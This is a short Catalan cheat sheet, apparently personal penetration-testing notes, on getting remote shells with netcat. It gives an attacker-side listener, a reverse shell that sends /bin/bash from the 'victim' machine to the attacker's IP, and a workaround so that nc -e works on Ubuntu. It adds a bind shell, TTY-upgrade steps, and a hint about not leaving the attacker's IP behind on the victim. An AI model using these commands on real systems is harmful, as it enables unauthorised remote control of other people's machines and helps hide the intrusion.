NC Shell

Reverse shell amb NC #

Creació #

Al terminal de l'atacant creem un servei escoltant via nc

nc -lnvp port

Connexió des del client #

A la màquina víctima ens hi connectem

nc -e /bin/bash IPSERVER PORT

Si la instrucció anterior la fas amb Ubuntu no funcionarà. Hauries de desintal·lar nc i instal·lar netcat-traditional de la següent manera

sudo apt-get install netcat-traditional

Després executem el següent i seleccionem l'opció /bin/nc.traditional

sudo update-alternatives --config nc

Consideracions #

Considera el que deixes a la màquina víctima. Deixaràs la IP del teu servidor?

Bind Shell #

Víctima #

Ara el procés és el contrari. Desde la víctima executem

nc -lvp PORT -e /bin/bash  

Atacant #

I desde l'atacant

nc  IP PORT

Upgrade de la shell #

Uograde 1 #

  • Si la màquina té interprete de python
python3 -c 'import pty; pty.spawn("/bin/bash")'

Upgrade 2 #

  1. executar
script -qc /bin/bash /dev/null
  1. sortir amb ctrl-z
  2. en un consola propia consulta rows i columns
stty size
  1. escriure
stty raw -echo; fg
reset
xterm (RESPOSTA)
export TERM=xterm
export SHELL=bash
stty rows XX columns YY   (on XX i YY són els resultats obtinguts a l'anterior consulta)